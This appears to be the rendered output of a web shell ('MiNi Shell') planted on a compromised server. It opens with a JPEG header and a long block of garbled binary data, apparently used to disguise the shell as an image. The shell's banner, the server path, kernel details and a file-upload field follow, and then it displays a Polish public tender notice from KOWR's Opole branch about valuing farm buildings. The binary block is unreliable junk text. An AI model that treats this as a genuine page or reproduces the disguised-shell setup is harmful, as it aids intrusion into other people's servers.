JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211124/0028246401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wycena do celów księgowych (w tym amortyzacji) budynków i budowli położonych na terenie woj. opolskiego, powiatu brzeskiego, głubczyckiego, kluczborskiego i strzeleckiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KRAJOWY OŚRODEK WSPARCIA ROLNICTWA</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">ODDZIAŁ TERENOWY W OPOLU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 36784953800113</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">1 Maja 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-068</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.opole@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.kowr.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa osoba prawna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Realizacja zadań w zakresie wdrażania i stosowania instrumentów wsparcia rolnictwa, gospodarowanie nieruchomościami Skarbu Państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wycena do celów księgowych (w tym amortyzacji) budynków i budowli położonych na terenie woj. opolskiego, powiatu brzeskiego, głubczyckiego, kluczborskiego i strzeleckiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-421159b5-4cfe-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00282464</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011465/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Wyceny nieruchomości rolnych/nierolnych, zabudowanych i niezabudowanych oraz lokali mieszkalnych wraz z prawem opcji</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://kowr.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia odbywa się w języku polskim przy użyciu<br/>środków komunikacji elektronicznej, za pośrednictwem Platformy Zakupowej pod adresem<br/>https://kowr.eb2b.com.pl/ i pod numerem postępowania wskazanym w ust. 11.17 SWZ.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na Platformie Zakupowej. Zarejestrowanie i utrzymywanie konta na Platformie<br/>Zakupowej oraz korzystanie z Platformy jest bezpłatne. Wymagania techniczne i organizacyjne<br/>korzystania z Platformy Zakupowej określa Regulamin Platformy Zakupowej dostępny pod adresem<br/>internetowym https://platforma.eb2b.com.pl/user/terms. Wykonawca przystępując do postępowania o<br/>udzielenie zamówienia publicznego tj. bezpłatnie rejestrując się lub logując (w przypadku posiadania<br/>konta w Platformie Zakupowej), akceptuje warunki korzystania z Platformy, określone w Regulaminie<br/>oraz uznaje go za wiążący. Wykonawca korzystając z Platformy zobowiązuje się do przestrzegania<br/>postanowień zawartych w ww. instrukcji oraz w regulaminie Platformy. Wszelkie dokumenty,<br/>oświadczenia, informacje, o których mowa w SWZ, należy wczytać jako załączniki na Platformie,<br/>według Instrukcji korzystania z Platformy, dostępnej dla zalogowanych użytkowników w zakładce<br/>„Pomoc” – „Instrukcje”. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy<br/>wynosi 50 MB. Zamawiający, zgodnie z § 3 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia<br/>30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452), określa<br/>następujące niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie: 1) stały<br/>dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 2 mb/s; 2) komputer klasy<br/>PC lub PC lub MAC, o następującej konfiguracji: pamięć min. 4GB Ram, procesor Intel IV 4GHZ, jeden<br/>z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux lub ich nowsze wersje;<br/>3)zainstalowana dowolna najnowsza wersja przeglądarki internetowej; w przypadku Internet Explorer<br/>minimalnie wersja 11.0; 4) włączona obsługa JavaScript; 5) zainstalowany program Acrobat Reader.<br/>Zamawiający, zgodnie z § 3 ust. 1 rozporządzenia w sprawie sporządzania elektronicznych<br/>dokumentów oraz komunikacji elektronicznej określa informacje na temat kodowania i czasu odbioru<br/>danych: 1) wszelkie operacje na Platformie opierają się o czas serwera i dane zapisywane są z<br/>dokładnością co do setnej części sekundy;2) plik załączony przez Wykonawcę na Platformie i<br/>zapisany, widoczny jest w systemie jako zaszyfrowany. Możliwość otworzenia pliku dostępna jest<br/>dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert; 3) oznaczenie<br/>czasu odbioru danych przez Platformę stanowi przypiętą do dokumentu elektronicznego datę oraz<br/>dokładny czas (hh:mm:ss), znajdującą się po prawej stronie dokumentu w kolumnie „Data przesłania”.<br/>Za datę przekazania na Platformę oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy<br/>Pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych<br/>informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich<br/>wczytania do Platformy. Potwierdzeniem prawidłowo przekazanego (dokumentu elektronicznego) jest<br/>automatyczne wygenerowanie komunikatu systemowego o treści „Plik został przesłany&#34;, po każdej<br/>prawidłowo wykonanej operacji. Oferta i oświadczenia dotyczące przesłanek wykluczenia<br/>z postępowania oraz spełniania warunków udziału w postępowaniu pod rygorem nieważności muszą<br/>być<br/>sporządzone w formie elektronicznej (opatrzone kwalifikowanym podpisem elektronicznym) lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z04.05.2016, str. 1), dalej jako „RODO”, wszystkie osoby, które ubiegają się o udzielenie zamówienia/złożyły ofertę. Zamawiający informuje, że: 1. Administrator danych osobowych Administratorem, czyli podmiotem decydującym o celach i środkach przetwarzania<br/>Pani/Pana danych osobowych, jest Krajowy Ośrodek Wsparcia Rolnictwa (zwany dalej KOWR) z siedzibą w Warszawie (01-207) przy ul. Karolkowej 30. Z administratorem może się Pani/Pan skontaktować poprzez adres e-mail:kontakt@kowr.gov.pl lub pisemnie na adres korespondencyjny:<br/>Krajowy Ośrodek Wsparcia Rolnictwa, ul. Karolkowa 30, 01-207 Warszawa. 2. Inspektor Ochrony Danych Osobowych W KOWR wyznaczono Inspektora Ochrony Danych Osobowych, z którym może się Pani/Pan skontaktować w sprawach ochrony i przetwarzania swoich danych osobowych pod adresem<br/>e-mail: iodo@kowr.gov.pl lub pisemnie na adres naszej siedziby, wskazany w ust. 1.3. Cele i podstawy prawne przetwarzania danych osobowych Pani/Pana dane osobowe przetwarzane będą w celach związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym na podstawie ustawy<br/>z dnia 11września 2019 r. Prawo zamówień publicznych – Dz.U. z 2019 r. poz. 2019 z póżn. zm. (dalej PZP), w celach związanych z realizacją obowiązków administratora jako Zamawiającego, które wynikają zobowiązujących przepisów prawa. Pani/Pana dane osobowe przetwarzane będą także w celu realizacji obowiązku prowadzenia ewidencji korespondencji i archiwizacji dokumentacji zgodnie z ustawą z dnia14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164<br/>z późn.zm.). 4. Odbiorcy danych osobowych Pani/Pana dane pozyskane w związku z postępowaniem<br/>o udzielenie zamówienia publicznego przekazywane będą wszystkim zainteresowanym podmiotom i<br/>osobom, gdyż co do zasady postępowanie o udzielenie zamówienia publicznego<br/>jest jawne. Ograniczenie dostępu do Pani/Pana danych, o których mowa wyżej może wystąpić jedynie<br/>w szczególnych przypadkach, jeśli jest to uzasadnione ochroną prywatności, zgodnie z art. 18 ust 5 pkt<br/>1 i 2 PZP. Pani/Pana dane osobowe mogą być udostępniane innym osobom lub podmiotom jeżeli<br/>obowiązek taki będzie wynikać z przepisów prawa. Do Pani/Pana danych mogą też mieć<br/>dostęp podmioty przetwarzające dane w naszym imieniu, np. podmioty świadczące pomoc prawną,<br/>usługi informatyczne, usługi niszczenia dokumentów, jak również inni administratorzy danych<br/>osobowych przetwarzający dane we własnym imieniu, np. podmioty prowadzące działalność pocztową<br/>lub kurierską. 5. Okres przetwarzania danych osobowych Pani/Pana dane osobowe będą<br/>przetwarzane przez okres przewidziany przepisami prawa w tym zakresie, w tym przez okres<br/>przechowywania dokumentacji określony w przepisach powszechnych i uregulowaniach wewnętrznych<br/>KOWR w zakresie archiwizacji dokumentów, okres przedawnienia roszczeń przysługujących KOWR i<br/>w stosunku do niego. Dokumentacja dotycząca postępowania o udzielenie zamówienia publicznego<br/>będzie przechowywana, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, licząc od dnia 1 stycznia roku następnego po dniu zakończenia<br/>postępowania, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały<br/>czas trwania umowy. 6. Informacja o wymogu/dobrowolności podania danych osobowych Podanie<br/>Pani/Pana danych osobowych w związku z udziałem w postępowaniu o udzielenie zamówienia ma<br/>charakter dobrowolny, ale jest niezbędne do wzięcia w nim udziału</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">7. Prawa osób, których dane dotyczą Zgodnie z<br/>RODO przysługuje Pani/Panu:1) prawo dostępu do swoich danych oraz otrzymania ich kopii; 2) prawo<br/>do sprostowania (poprawiania) swoich danych; 3) prawo do usunięcia danych osobowych, w sytuacji,<br/>gdy przetwarzanie danych nie następuje w celu wywiązania się z obowiązku wynikającego z<br/>przepisu prawa lub w ramach sprawowania władzy publicznej; 4) prawo do ograniczenia przetwarzania<br/>danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego prawa. Jeżeli<br/>chce Pani/Pan skorzystać z któregokolwiek z tych uprawnień, prosimy o kontakt z Inspektorem<br/>Ochrony Danych Osobowych, wskazany w pkt 2 lub pisemnie na adres korespondencyjny, wskazany<br/>w pkt 1. Zgodnie z RODO, każdej osobie, której dane są przetwarzane przysługuje prawo do<br/>wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych. 8. Zautomatyzowane<br/>podejmowanie decyzji W oparciu o Pani/Pana dane osobowe administrator nie będzie podejmował<br/>wobec Pani/Pana zautomatyzowanych decyzji, w tym decyzji będących wynikiem profilowania. 9.<br/>Przekazywanie danych poza Europejski Obszar Gospodarczy W związku z jawnością postępowania o<br/>udzielenie zamówienia publicznego Pani/Pana dane mogą być przekazywane do państw trzecich (tj.<br/>państwa, które nie należy do Europejskiego Obszaru Gospodarczego obejmującego Unię Europejską,<br/>Norwegię, Liechtenstein i Islandię), z zastrzeżeniem, o którym mowa w punkcie 4.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OP.WOP.ZP.28.2021.U</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1.	Przedmiotem zamówienia jest: <br/>Wycena do celów księgowych (w tym amortyzacji) budynków i budowli położonych na terenie woj. opolskiego, powiatu brzeskiego, głubczyckiego, kluczborskiego i strzeleckiego wg poniższego wykazu:<br/>Lp.	Nazwa	Powiat	Gmina	Obręb	Działka<br/>1	Pomieszczenie biurowe w budynku wielorodzinnym Polana 11	brzeski	Grodków	Wierzbnik	578 k.m. 3<br/>2	Budynek stacji transformatorowej	brzeski	Grodków	Kopice	399/4 k.m. 11<br/>3	Budynek stacji paliw z dystrybutorem	głubczycki	Głubczyce	Lwowiany	107 k.m. 1<br/>4	Budynek wagi wozowej	głubczycki	Głubczyce	Lwowiany	7/19 k.m. 7<br/>5	Budynek hydroforni	głubczycki	Głubczyce	Pomorzowice	279/1 k.m. 2<br/>6	Budynek gospodarczy II	głubczycki	Głubczyce	Zopowy	53/7 k.m. 2<br/>7	Budynek gospodarczy III	głubczycki	Głubczyce	Zopowy	53/7 k.m. 2<br/>8	Ogrodzenie murowane	głubczycki	Głubczyce	Zopowy	53/7 k.m. 2<br/>9	Budynek gospodarczy	kluczborski	Byczyna	Sarnów	20/14 k.m.3<br/>10	Budynek gospodarczy – zewnętrzna piwnica (udział KOWR 1/16)	kluczborski	Kluczbork	Smardy Dolne	4/19 k.m. 7<br/>11	wiata	kluczborski	Wołczyn	Komorzno	29/37 k.m. 1<br/>12	magazyn	kluczborski	Wołczyn	Rożnów	381/3 k.m. 6<br/>13	Rampa najazdowa	strzelecki	Izbicko	Siedlec	446/32 k.m. 5<br/>14	Budynek gospodarczy nr I, 8-segmentowy, ul. Wiejska 1,<br/>(własność KOWR segmenty nr 5, 6, 7)	strzelecki	Ujazd	Olszowa	297 k.m. 1<br/><br/>Pozostałe informacje: <br/>•	Wycenę należy sporządzić w formie operatu szacunkowego w jednym egzemplarzu, wartość należy określić osobno dla każdej pozycji z wykazu.<br/>•	Wykonawca nie otrzyma od Zamawiającego danych ze starostwa powiatowego właściwego, co do położenia nieruchomości, tj. wypisu z kartoteki budynków, itp.<br/>•	Wykonawca nie otrzyma od Zamawiającego wymiarów przedmiotowych budynków i budowli.<br/>•	Wykonawca przekazuje Zamawiającemu operat szacunkowy protokołem zdawczo – odbiorczym.<br/>4.2. Pozostałe wymogi i sposób wykonania zamówienia oraz prawa i obowiązki Stron zostały określone <br/>w Projektowanych postanowieniach umowy, stanowiących załącznik nr 3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> warunki udziału w postępowaniu, dotyczące: zdolności technicznej lub zawodowej.<br/>Warunek ten Zamawiający uzna za spełniony, jeżeli Wykonawca wykaże Zamawiającemu, że dysponuje co najmniej jedną osobą, która będzie brała udział w realizacji zamówienia, posiadającą wymagane uprawnienia w zakresie szacowania nieruchomości <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jego złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz osób (załącznik nr 4 do SWZ) skierowanych przez Wykonawcę do<br/>realizacji zamówienia publicznego (co najmniej jedna osoba posiadająca wymagane uprawnienia<br/>w zakresie szacowania nieruchomości), w szczególności odpowiedzialnych za świadczenie usług, wraz<br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów – w przypadku gdy Wykonawca polega na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby, w celu spełnienia warunku udziału<br/>w postępowaniu - wzór zobowiązania stanowi załącznik nr 5 do SWZ,<br/>2) oświadczenie wynikające z art. 117 ust 4 ustawy Pzp, o którym mowa w rozdziale VIII ust. 8.2<br/>pkt 2) SWZ - w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców - wzór<br/>oświadczenia stanowi załącznik nr 6 do SWZ.<br/>3) w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania - odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji Informacji o Działalności Gospodarczej lub innego właściwego rejestru, chyba że Zamawiający<br/>może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów, z zastrzeżeniem ust. 16.8. swz.<br/>Powyższy wymóg stosuje się również odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy oraz do podwykonawcy.<br/>4) pełnomocnictwo, jeżeli Wykonawca samodzielnie składający ofertę jest reprezentowany przez pełnomocnika;<br/>5) w przypadku Wykonawców wspólnie ubiegających się o 